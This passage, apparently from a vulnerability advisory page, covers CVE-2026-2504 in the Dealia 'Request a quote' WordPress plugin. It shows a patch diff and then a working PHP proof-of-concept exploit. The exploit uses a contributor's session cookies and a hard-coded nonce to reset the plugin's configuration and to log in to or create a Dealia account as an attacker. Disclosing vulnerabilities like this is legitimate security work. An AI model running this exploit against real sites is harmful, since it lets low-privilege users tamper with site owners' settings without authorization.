-$_token = (!empty($access_token)) ? $access_token : false;
-$_dealia_page = (!empty($dealia_page)) ? $dealia_page : false;
+$dealia_token = (!empty($dealia_access_token)) ? $dealia_access_token : false;
+$dealia_page = (!empty($dealia_page)) ? $dealia_page : false;
 ?>

-<?php if($_token && $_dealia_page): ?>
+<?php if($dealia_token && $dealia_page): ?>

 	<div id="dealia-page-container" class="dealia-page-content dealia-page-forms" style="margin:0px;padding:0px;overflow:hidden;height:700px;">
 		<iframe
-			src="<?php dealia_escape_echo(DEALIA_SITE_ADMIN_URL . "/DealiaAdmin.html#" . $_dealia_page . "?authtoken=" . $_token . '&nocontrol=1'); ?>"
+			src="<?php dealia_escape_echo(DEALIA_SITE_ADMIN_URL . "/DealiaAdmin.html#" . $dealia_page . "?authtoken=" . $dealia_token . '&nocontrol=1'); ?>"
 			frameborder="0"
 			style="overflow:hidden;height:100%;width:100%" height="100%" width="100%"
 		>
@@ -17,6 +17,6 @@
 	</div>

 <?php else:
-    wp_redirect( admin_url('admin.php?page=dealia') );
-    exit;
+    wp_safe_redirect( admin_url('admin.php?page=dealia') );
+    exit();
  endif; ?>
--- a/dealia-request-a-quote/templates/main-page-header.php
+++ b/dealia-request-a-quote/templates/main-page-header.php
@@ -1,7 +1,6 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+<?php $dealia_all_set = (!empty($dealia_all_set)) ? $dealia_all_set : false; ?>
 <div class="dealiaintro">
-
-
 	<div class="text-img-cont-d">
         <div class="text-intro-cont-d">
             <h2>	<b class="dealiahighlight">Dealia</b> - embed custom buttons and forms anywhere on your website </h2>
@@ -10,7 +9,7 @@
                 <li>Add a 'Request a Quote' button to any content or product page to receive multi-item or single-item quotes.</li>
                 <li>Create unlimited forms and assign them anywhere on your site. </li>
                 <li>Optionally negotiate prices, close deals seamlessly, and get paid - all in one place. </li>
-                <?php if( ! empty($all_set) ): ?>
+                <?php if( ! empty($dealia_all_set) ): ?>
                     <li>The <a href="/wp-admin/admin.php?page=dealia-billing" >Paid plan</a> is <b class="dealiahighlight">unlimited</b>, whereas the Free plan allows for <b class="dealiahighlight">10</b> quotes.</li>
                 <?php endif;?>
             </ul>
--- a/dealia-request-a-quote/templates/main-page-steps-footer.php
+++ b/dealia-request-a-quote/templates/main-page-steps-footer.php
@@ -1,4 +1,5 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+
 <div class="dealia-get-started">
 	<div class="d-icon-cont">
 	<h1><?php esc_html_e( "Get started with Dealia!", 'dealia-request-a-quote' ); ?></h1>
@@ -13,64 +14,44 @@
 		<div class="daSteps daSteps-wide d-woo">
 			<div class="daSteps-inner woo-set-cont">
 				<?php dealia_template_echo('footer/part-woocommerce.php', [
-					'options_set' => (!empty($options_set) ? $options_set : false),
-					'access_token_set' => (!empty($access_token_set) ? $access_token_set : false),
-					'is_woocommerce_active' => (!empty($is_woocommerce_active) ? $is_woocommerce_active : false),
-					'hide_add_to_cart' => (!empty($hide_add_to_cart) ? $hide_add_to_cart : false),
-					'hide_prices' => (!empty($hide_prices) ? $hide_prices : false),
-					'forms' => (!empty($forms) ? $forms : array()),
-					'form_for_all_products' => (!empty($form_for_all_products) ? $form_for_all_products : ""),
-					'products_covered' => (!empty($products_covered) ? $products_covered : 'selected'),
+					'dealia_options_set' => (!empty($dealia_options_set) ? $dealia_options_set : false),
+					'dealia_access_token_set' => (!empty($dealia_access_token_set) ? $dealia_access_token_set : false),
+					'dealia_is_woocommerce_active' => (!empty($dealia_is_woocommerce_active) ? $dealia_is_woocommerce_active : false),
+					'dealia_hide_add_to_cart' => (!empty($dealia_hide_add_to_cart) ? $dealia_hide_add_to_cart : false),
+					'dealia_hide_prices' => (!empty($dealia_hide_prices) ? $dealia_hide_prices : false),
+					'dealia_forms' => (!empty($dealia_forms) ? $dealia_forms : array()),
+					'dealia_form_for_all_products' => (!empty($dealia_form_for_all_products) ? $dealia_form_for_all_products : ""),
+					'dealia_products_covered' => (!empty($dealia_products_covered) ? $dealia_products_covered : 'selected'),
 				]); ?>
 			</div>

-
-
 			<div class="help-cont-d daSteps-inner">

-			<div class="d-icons help-ico-d"> </div>
-
-			<h3>Support</h3>
-
-	<p class="woo-set">
-		<?php esc_html_e("All features offered by our platform are described in our", 'dealia-request-a-quote'); ?>
-		<b>
-			<a class="dealiahighlight"
-				href="https://dealia.com/help/"
-				target="_blank">
-				<?php esc_html_e("Help Center", 'dealia-request-a-quote'); ?>
-			</a>
-		</b>.
-	</p>
-	<p class="woo-set">
-		Do you have any questions? Feel free to
-		<b>
-			<a class="dealiahighlight"
-			   href="https://dealia.com/contact"
-	           target="_blank">
-				<?php esc_html_e("Contact Us", 'dealia-request-a-quote'); ?>
-			</a>
-		</b>.
-	</p>
-
-	</div>
-
+                <div class="d-icons help-ico-d"> </div>

+                <h3>Support</h3>

+                <p class="woo-set">
+                    <?php esc_html_e("All features offered by our platform are described in our", 'dealia-request-a-quote'); ?>
+                    <b>
+                        <a class="dealiahighlight"
+                            href="https://dealia.com/help/"
+                            target="_blank">
+                            <?php esc_html_e("Help Center", 'dealia-request-a-quote'); ?>
+                        </a>
+                    </b>.
+                </p>
+                <p class="woo-set">
+                    Do you have any questions? Feel free to
+                    <b>
+                        <a class="dealiahighlight"
+                           href="https://dealia.com/contact"
+                           target="_blank">
+                            <?php esc_html_e("Contact Us", 'dealia-request-a-quote'); ?>
+                        </a>
+                    </b>.
+                </p>
+        	</div>
 		</div>
-
-
-
-
-
-
-
-
-
 	</div>
-
-
-
-
-
 </div>
--- a/dealia-request-a-quote/templates/main-page.php
+++ b/dealia-request-a-quote/templates/main-page.php
@@ -1,6 +1,5 @@
-<?php if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-} ?>
+<?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+
 <div id="dealia-loader-wrapper" class="dealia-loader-wrapper dealia-hidden">
     <div class="dealia-loader dealia-text-primary">
     </div>
@@ -8,10 +7,10 @@

 <div class="top-dash-items-d">

-	<?php dealia_template_echo( 'main-page-header.php', ['all_set' => (! empty( $options_set ) && $options_set)] ); ?>
+	<?php dealia_template_echo( 'main-page-header.php', ['dealia_all_set' => (! empty( $dealia_options_set ) && $dealia_options_set)] ); ?>
+
+    <?php wp_nonce_field( 'dealia_admin_nonce', 'dealia_nonce');  ?>

-    <input type="hidden" id="dealia_nonce"
-           value="<?php dealia_escape_echo( wp_create_nonce( DEALIA_ADMIN_NONCE ) ); ?>"/>
     <input type="hidden" id="dealia_admin_ajax" value="<?php dealia_escape_echo( admin_url( 'admin-ajax.php' ) ); ?>"/>

     <div class="wrap dealiaformwrap">
@@ -20,20 +19,20 @@
             <img class="dealiaicon" src="<?php echo esc_url( DEALIA_PLUGIN_URL . 'assets/images/dealiaicon.png' ); ?>">
         </div>

-        <?php if ( empty( $access_token_set ) ): ?>
+        <?php if ( empty( $dealia_access_token_set ) ): ?>
             <h3>
                 <?php esc_html_e( 'First, connect your Dealia account:', 'dealia-request-a-quote' ); ?>
             </h3>
         <?php endif; ?>

-		<?php if ( ! empty( $options_set ) && $options_set ): ?>
+		<?php if ( ! empty( $dealia_options_set ) && $dealia_options_set ): ?>
 			<?php dealia_template_echo( 'steps/step_final_allset.php', [
-				'access_token_set' => ( ! empty( $access_token_set ) ? $access_token_set : false ),
-                'is_permalink_supported' => (! empty( $is_permalink_supported ) ? $is_permalink_supported : false ),
+				'dealia_access_token_set' => ( ! empty( $dealia_access_token_set ) ? $dealia_access_token_set : false ),
+                'dealia_is_permalink_supported' => (! empty( $dealia_is_permalink_supported ) ? $dealia_is_permalink_supported : false ),
 			] ); ?>
 		<?php else: ?>
 			<?php dealia_template_echo( 'steps/step1_select_setup_variants.php', [
-                    'countries_list' => ( ! empty( $countries_list ) ? $countries_list : [] ),
+                    'dealia_countries_list' => ( ! empty( $dealia_countries_list ) ? $dealia_countries_list : [] ),
             ]); ?>
 		<?php endif; ?>
     </div>
@@ -41,13 +40,13 @@
 </div>

 <?php dealia_template_echo( 'main-page-steps-footer.php', [
-	'options_set'           => ( ! empty( $options_set ) ? $options_set : false ),
-	'access_token_set'      => ( ! empty( $access_token_set ) ? $access_token_set : false ),
-	'is_woocommerce_active' => ( ! empty( $is_woocommerce_active ) ? $is_woocommerce_active : false ),
-	'hide_add_to_cart'      => ( ! empty( $hide_add_to_cart ) ? $hide_add_to_cart : false ),
-	'hide_prices'           => ( ! empty( $hide_prices ) ? $hide_prices : false ),
-	'forms'                 => ( ! empty( $forms ) ? $forms : array() ),
-	'form_for_all_products' => ( ! empty( $form_for_all_products ) ? $form_for_all_products : "" ),
-	'products_covered'      => ( ! empty( $products_covered ) ? $products_covered : 'selected' ),
+	'dealia_options_set'           => ( ! empty( $dealia_options_set ) ? $dealia_options_set : false ),
+	'dealia_access_token_set'      => ( ! empty( $dealia_access_token_set ) ? $dealia_access_token_set : false ),
+	'dealia_is_woocommerce_active' => ( ! empty( $dealia_is_woocommerce_active ) ? $dealia_is_woocommerce_active : false ),
+	'dealia_hide_add_to_cart'      => ( ! empty( $dealia_hide_add_to_cart ) ? $dealia_hide_add_to_cart : false ),
+	'dealia_hide_prices'           => ( ! empty( $dealia_hide_prices ) ? $dealia_hide_prices : false ),
+	'dealia_forms'                 => ( ! empty( $dealia_forms ) ? $dealia_forms : array() ),
+	'dealia_form_for_all_products' => ( ! empty( $dealia_form_for_all_products ) ? $dealia_form_for_all_products : "" ),
+	'dealia_products_covered'      => ( ! empty( $dealia_products_covered ) ? $dealia_products_covered : 'selected' ),
 ] ); ?>

--- a/dealia-request-a-quote/templates/steps/step1_select_setup_variants.php
+++ b/dealia-request-a-quote/templates/steps/step1_select_setup_variants.php
@@ -1,4 +1,5 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+
 <div id="dealia-setup-options" class="dealia-setup-options">
 	<div id="dealia-register" class="option margin-bottom-d">Sign up</div>
 <div class="margin-bottom-d">	OR </div>
@@ -11,7 +12,7 @@

 		</div>
 		<?php dealia_template_echo('steps/step2_register.php', [
-                'countries_list' => ( ! empty( $countries_list ) ? $countries_list : [] ),
+                'dealia_countries_list' => ( ! empty( $dealia_countries_list ) ? $dealia_countries_list : [] ),
         ]); ?>
 	</div>
 	<div id="dealia-lodin-block" class="dealia-action dealia-hidden">
--- a/dealia-request-a-quote/templates/steps/step2_register.php
+++ b/dealia-request-a-quote/templates/steps/step2_register.php
@@ -1,14 +1,15 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+
 <?php
-if( ! empty( $countries_list ) ) {
-    $country_column = [];
-    $currency_column = [];
-    foreach ($countries_list as $key => $row) {
-        $country_column[$row['country_code']] = $row['country'];
-        $currency_column[$row['currency_code']] = $row['currency_name'];
+if( ! empty( $dealia_countries_list ) ) {
+    $dealia_country_column = [];
+    $dealia_currency_column = [];
+    foreach ($dealia_countries_list as $dealia_key => $dealia_row) {
+        $dealia_country_column[$dealia_row['country_code']] = $dealia_row['country'];
+        $dealia_currency_column[$dealia_row['currency_code']] = $dealia_row['currency_name'];
     }
-    asort($country_column);
-    asort($currency_column);
+    asort($dealia_country_column);
+    asort($dealia_currency_column);
 }
 ?>

@@ -60,11 +61,15 @@
 				</th>
 				<td>
 					<select id="dealia_country" class="dealia-form-input" name="dealia_options[dealia_country]">
-                        <?php if( ! empty( $country_column )): ?>
-                            <?php foreach ($country_column as $key => $value): ?>
-                                <option <?php if ($key === "US"): ?> selected <?php endif; ?> value="<?php echo $key; ?>"><?php echo $value; ?></option>
+                        <?php if( ! empty( $dealia_country_column )): ?>
+                            <?php foreach ($dealia_country_column as $dealia_key => $dealia_value): ?>
+                                <option
+                                        <?php if ($dealia_key === "US"): ?> selected <?php endif; ?>
+                                        value="<?php dealia_escape_echo( $dealia_key ); ?>">
+                                    <?php dealia_escape_echo( $dealia_value ); ?>
+                                </option>
                             <?php endforeach;?>
-                            <?php unset($key, $value); ?>
+                            <?php unset($dealia_key, $dealia_value); ?>
                         <?php endif;?>
 					</select>
 				</td>
@@ -77,11 +82,15 @@
 				</th>
 				<td>
 					<select id="dealia_currency" class="dealia-form-input" name="dealia_options[dealia_currency]">
-                        <?php if( ! empty( $currency_column )): ?>
-                            <?php foreach ($currency_column as $key => $value): ?>
-                                <option <?php if ($key === "USD"): ?> selected <?php endif; ?> value="<?php echo $key; ?>"><?php echo $value . " ( $key )"; ?></option>
+                        <?php if( ! empty( $dealia_currency_column )): ?>
+                            <?php foreach ($dealia_currency_column as $dealia_key => $dealia_value): ?>
+                                <option
+                                        <?php if ($dealia_key === "USD"): ?> selected <?php endif; ?>
+                                        value="<?php dealia_escape_echo( $dealia_key); ?>">
+                                    <?php dealia_escape_echo( $dealia_value . " ( $dealia_key )"); ?>
+                                </option>
                             <?php endforeach;?>
-                            <?php unset($key, $value); ?>
+                            <?php unset($dealia_key, $dealia_value); ?>
                         <?php endif;?>
 					</select>
 				</td>
--- a/dealia-request-a-quote/templates/steps/step3_login.php
+++ b/dealia-request-a-quote/templates/steps/step3_login.php
@@ -1,4 +1,5 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+
 <div id="dealia-form-login" class="dealia-form">
 	<div class="dealia-form-errors errors"></div>
 	<table class="form-table" role="presentation">
--- a/dealia-request-a-quote/templates/steps/step_final_allset.php
+++ b/dealia-request-a-quote/templates/steps/step_final_allset.php
@@ -1,10 +1,10 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit;

-$access_token_set = ( ! empty( $access_token_set ) ? $access_token_set : false );
-$permalink_supported = (!empty($is_permalink_supported)) ? $is_permalink_supported : false;
+$dealia_access_token_set = ( ! empty( $dealia_access_token_set ) ? $dealia_access_token_set : false );
+$dealia_permalink_supported = (!empty($dealia_is_permalink_supported)) ? $dealia_is_permalink_supported : false;
 ?>
 <div class="setup-options">
-	<?php if ( !$access_token_set ): ?>
+	<?php if ( !$dealia_access_token_set ): ?>
 	<div class="notice warning settings-error is-dismissible">
 		<p>
 			<strong class="error-message"><?php esc_html_e("Your email is not verified yet. Please use the link sent to your mailbox for verification. Then refresh to sync the integration", 'dealia-request-a-quote'); ?></strong>
@@ -18,7 +18,7 @@

 	<div class="d-icons thumbs-ico-d"> </div>
 		<p class="padding-bottom-d">
-            <?php if ( $access_token_set): ?>
+            <?php if ( $dealia_access_token_set): ?>
 	            <?php esc_html_e("Account is now connected and verified.", 'dealia-request-a-quote'); ?>
             <?php else: ?>
 	            <?php esc_html_e("Account connected", 'dealia-request-a-quote'); ?>
@@ -30,7 +30,7 @@
 	</div>
 </div>

-<?php if ( $access_token_set && !$permalink_supported ): ?>
+<?php if ( $dealia_access_token_set && !$dealia_permalink_supported ): ?>
     <style>
         #dealia-support-message {
             margin-top: 25px;
--- a/dealia-request-a-quote/templates/widgets/dealia-nonproduct-button.php
+++ b/dealia-request-a-quote/templates/widgets/dealia-nonproduct-button.php
@@ -1,19 +1,20 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
-<?php if (!empty($params)): ?>
+
+<?php if (!empty($dealia_params)): ?>
 <div>
 	<button
 		id="dealia_button_<?php dealia_escape_echo(time()); ?>"
 		contenteditable="false"
-		itemform="<?php dealia_escape_echo($params['form_name']); ?>"
-		itemname="<?php dealia_escape_echo($params['name']); ?>"
-		itemimage="<?php dealia_escape_echo($params['image_url']); ?>"
-		itemcolor="<?php dealia_escape_echo($params['button_color']); ?>"
-		data-itemform="<?php dealia_escape_echo($params['form_name']); ?>"
-		data-itemname="<?php dealia_escape_echo($params['name']); ?>"
-		data-itemimage="<?php dealia_escape_echo($params['image_url']); ?>"
-		data-itemcolor="<?php dealia_escape_echo($params['button_color']); ?>"
+		itemform="<?php dealia_escape_echo($dealia_params['form_name']); ?>"
+		itemname="<?php dealia_escape_echo($dealia_params['name']); ?>"
+		itemimage="<?php dealia_escape_echo($dealia_params['image_url']); ?>"
+		itemcolor="<?php dealia_escape_echo($dealia_params['button_color']); ?>"
+		data-itemform="<?php dealia_escape_echo($dealia_params['form_name']); ?>"
+		data-itemname="<?php dealia_escape_echo($dealia_params['name']); ?>"
+		data-itemimage="<?php dealia_escape_echo($dealia_params['image_url']); ?>"
+		data-itemcolor="<?php dealia_escape_echo($dealia_params['button_color']); ?>"
 		class="daQuoteBtn daManualBtn daBtnGeneral daNonBtnClass"
-		style="background-color:<?php dealia_escape_echo($params['button_color']); ?>;"
-	><?php dealia_escape_echo($params['button_text']); ?></button>
+		style="background-color:<?php dealia_escape_echo($dealia_params['button_color']); ?>;"
+	><?php dealia_escape_echo($dealia_params['button_text']); ?></button>
 </div>
 <?php endif; ?>
--- a/dealia-request-a-quote/templates/widgets/post-edit-legacy.php
+++ b/dealia-request-a-quote/templates/widgets/post-edit-legacy.php
@@ -1,4 +1,5 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
+
 <div id="dealia-loader-wrapper" class="dealia-loader-wrapper dealia-hidden">
 	<div class="dealia-loader dealia-text-primary">
 	</div>
@@ -18,7 +19,7 @@
 		<div class="media-modal-content" role="document">

 			<div class="wrap">
-                <?php wp_nonce_field( DEALIA_ADMIN_NONCE, DEALIA_ADMIN_NONCE ); ?>
+                <?php wp_nonce_field( 'dealia_post_nonce', 'nonce');  ?>

 				<h1>
 					<?php esc_attr_e( 'Dealia button configuration', 'dealia-request-a-quote' ); ?>
--- a/dealia-request-a-quote/templates/widgets/product-edit-widget.php
+++ b/dealia-request-a-quote/templates/widgets/product-edit-widget.php
@@ -1,11 +1,11 @@
 <?php if ( ! defined( 'ABSPATH' ) ) exit;

-$all_products_enabled = (!empty($all_products_enabled)) ? $all_products_enabled : false;
-$all_products_enabled_val = ($all_products_enabled)? 1 : 0;
-$current_form_id = (!empty($current_form)) ? $current_form : 0;
-$permalink_supported = (!empty($is_permalink_supported)) ? $is_permalink_supported : false;
+$dealia_all_products_enabled = (!empty($dealia_all_products_enabled)) ? $dealia_all_products_enabled : false;
+$dealia_all_products_enabled_val = ($dealia_all_products_enabled)? 1 : 0;
+$dealia_current_form_id = (!empty($dealia_current_form)) ? $dealia_current_form : 0;
+$dealia_permalink_supported = (!empty($dealia_is_permalink_supported)) ? $dealia_is_permalink_supported : false;
 ?>
-<?php if(!$permalink_supported): ?>
+<?php if(!$dealia_permalink_supported): ?>
     <div id="dealia-support-message" class="notice notice-warning">
         <p>
             <?php esc_attr_e('Your permalinks type is not supported by Dealia. Please change or visit our ', 'dealia-request-a-quote'); ?>
@@ -21,8 +21,8 @@

 <?php else: ?>

-    <?php if (!empty($forms)): ?>
-        <input type="hidden" name="dealia_app_products_enabled" value="<?php wp_kses( $all_products_enabled_val, []); ?>" />
+    <?php if (!empty($dealia_forms)): ?>
+        <input type="hidden" name="dealia_app_products_enabled" value="<?php wp_kses( $dealia_all_products_enabled_val, []); ?>" />
         <div class="row">
             <input
                 id="dealia-field-dealia_active"
@@ -30,8 +30,8 @@
                 type="checkbox"
                 name="dealia_is_active"
                 value="1"
-                <?php if($current_form_id !== 0 || $all_products_enabled): ?> checked="checked" <?php endif; ?>
-                <?php if($all_products_enabled): ?> disabled="disabled" <?php endif; ?>
+                <?php if($dealia_current_form_id !== 0 || $dealia_all_products_enabled): ?> checked="checked" <?php endif; ?>
+                <?php if($dealia_all_products_enabled): ?> disabled="disabled" <?php endif; ?>
             />
             <label for="dealia-field-dealia_active" class="dealia-field-label">
                 <?php esc_attr_e('Active', 'dealia-request-a-quote'); ?>:
@@ -42,9 +42,9 @@
                 <?php esc_attr_e('Form', 'dealia-request-a-quote'); ?>:
             </label>
             <select id="dealia-field-dealia_forms" name="dealia_forms" class="dealia-product-forms">
-                <?php foreach ($forms as $form): ?>
-                    <option <?php if($current_form_id === $form['id']): ?> selected <?php endif; ?> value="<?php dealia_escape_echo( $form['id'] ); ?>">
-                        <?php dealia_escape_echo( $form['name'] ); ?>
+                <?php foreach ($dealia_forms as $dealia_form): ?>
+                    <option <?php if($dealia_current_form_id === $dealia_form['id']): ?> selected <?php endif; ?> value="<?php dealia_escape_echo( $dealia_form['id'] ); ?>">
+                        <?php dealia_escape_echo( $dealia_form['name'] ); ?>
                     </option>
                 <?php endforeach; ?>
             </select>

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2504 - Dealia – Request a quote <= 1.0.7 - Missing Authorization to Authenticated (Contributor+) Plugin Configuration Reset

<?php
/**
 * Proof of Concept for CVE-2026-2504
 * Requires WordPress authentication cookies and Contributor or higher permissions
 */

$target_url = 'https://vulnerable-wordpress-site.com';
$admin_nonce = 'nonce_Y7deR0HjpErwQn'; // DEALIA_ADMIN_NONCE constant from version <= 1.0.7

// Initialize cURL session
$ch = curl_init();

// Set base options
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Set authentication cookies (replace with actual session cookies)
$cookies = 'wordpress_logged_in_xxx=xxx; wordpress_sec_xxx=xxx;'; // Contributor session cookies
curl_setopt($ch, CURLOPT_COOKIE, $cookies);

// Method 1: Reset plugin configuration (most impactful)
echo "Attempting plugin configuration reset...n";
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);

$reset_payload = [
    'action' => 'dealia_ajax_reset',
    '_wpnonce' => $admin_nonce
];

curl_setopt($ch, CURLOPT_POSTFIELDS, $reset_payload);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

echo "Reset Response (HTTP $http_code): ";
print_r(json_decode($response, true));
echo "nn";

// Method 2: Attempt login to external Dealia service
echo "Attempting Dealia service login...n";
$login_payload = [
    'action' => 'dealia_ajax_login',
    '_wpnonce' => $admin_nonce,
    'email' => 'attacker@example.com',
    'password' => 'password123'
];

curl_setopt($ch, CURLOPT_POSTFIELDS, $login_payload);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

echo "Login Response (HTTP $http_code): ";
print_r(json_decode($response, true));
echo "nn";

// Method 3: Create new Dealia account
echo "Attempting Dealia account creation...n";
$account_payload = [
    'action' => 'dealia_ajax_manage_account',
    '_wpnonce' => $admin_nonce,
    'email' => 'attacker@example.com',
    'password' => 'password123',
    'first_name' => 'Attacker',
    'last_name' => 'Name',
    'company_name' => 'Malicious Corp',
    'country' => 'US'
];

curl_setopt($ch, CURLOPT_POSTFIELDS, $account_payload);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

echo "Account Creation Response (HTTP $http_code): ";
print_r(json_decode($response, true));

curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School